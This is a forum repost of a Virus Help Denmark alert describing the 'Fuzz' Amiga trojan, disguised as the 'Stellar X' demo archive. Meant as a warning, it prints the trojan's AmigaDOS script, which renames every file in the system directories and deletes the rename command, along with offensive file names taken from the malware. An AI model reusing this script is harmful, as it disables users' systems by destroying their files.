This message to share with you a very recent trojan alert :
Code:
------------------------
Amiga Virus Encyclopedia
Fuzz Trojan
Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
------------------------------------------------------------
........................ VIRUS HELP DENMARK ......................
Hi All.... 11 april 2020
We have just recived this archive. It is said to be a demo for ECS &
AGA machines. But if you run this demo, your Amiga system will in C:,
S:, Devs:, L; Libs:, will be renamed
We are not really sure how old this trojan are but at this time there
is NO ANTIVIRUS program that can find it. So watch out for it.
Here is some info about the trojan:
------------------------------------------------------
Trojan name... : Fuzz
Trojan file... : Many files do damage
Trojan size... : Many files
Trojan archive : Stellarx.lha
Archive size.. : 444.898 bytes
Archive info.. : 'Stellar X' Demo - ECS & AGA Machines
------------------------------------------------------
There is an ReadMe.txt in the archive, with an add from a Canadian BBS,
called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem.
So we guess it must be an old trojan, there aint many BBS'es left
The trojan bomb is named 'Stellar X Demo'. When you start the Demo,
it looks like this:
Yo! Fuk-Dat-Boyee... UpTheAss
Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
navel creditz
The FuZZ trojan archive contains many other files:
BooYaKa = Script-File
BooYaka.info = Icon
ReadMe.txt = BBS add
DATA/Boyee = Rename-Command
DATA/Yo! = Run-Command
DATA/Fuk-Dat-Boyee... = CLI Show-Command (Picture-Shower)
DATA/navel = Execute-Command
DATA/Fuk-Diz-Boyee... = Noiseplayer (Module-Player)
DATA/Wigger! = Soundmodule
DATA/fuzzy = List-Command
DATA/creditz = Script-File
DATA/Dude = Dir-Command
DATA/BooYaKa = Script-File
DATA/UpTheAss = Picture
If you start the trojan, it executes the Script-File 'BooYaKa':
Where you can read this in the script:
cd data
execute booyaka
This means that the trojan will execute the file
'DATA/BooYaKa'. This file contains:
Yo! Fuk-Dat-Boyee... UpTheAss
Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
navel creditz
Now the trojan displays the picture 'UpTheAss'.
Then the module Wigger!.
And executes the script-file creditz:
fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank
fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank
fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank
fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank
fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank
fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank
delete c:rename
Now the trojan will rename every file in:
S:
C:
Fonts:
Libs:
L:
Devs:
And deletes the command c:rename
Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
Regards....
__ Jan Andersen
__ /// ------------
\\\/// Virus Help Denmark
\XX/ www.vht-dk.dk
Source :
https://www.vht-dk.dk/amiga/amiga.htm